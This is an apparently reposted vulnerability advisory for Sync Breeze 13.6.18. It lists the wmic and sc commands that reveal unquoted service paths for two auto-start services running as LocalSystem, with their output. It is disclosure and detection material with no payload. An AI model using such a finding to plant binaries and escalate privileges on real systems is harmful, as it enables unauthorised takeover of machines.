Registersync breeze 13.6.18 multiple unquoted service path
▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.syncbreeze.com/ # Software Links: # https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe # https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe # Tested Version: 13.6.18 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze Server\bin\syncbrs.exe Auto Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto C:\Users\IEUser>sc qc "Sync Breeze Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Server\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc "Sync Breeze Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
Sync breeze 13.6.18 multiple unquoted service path Vulnerability / Exploit Source : Sync breeze 13.6.18 multiple unquoted service path
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes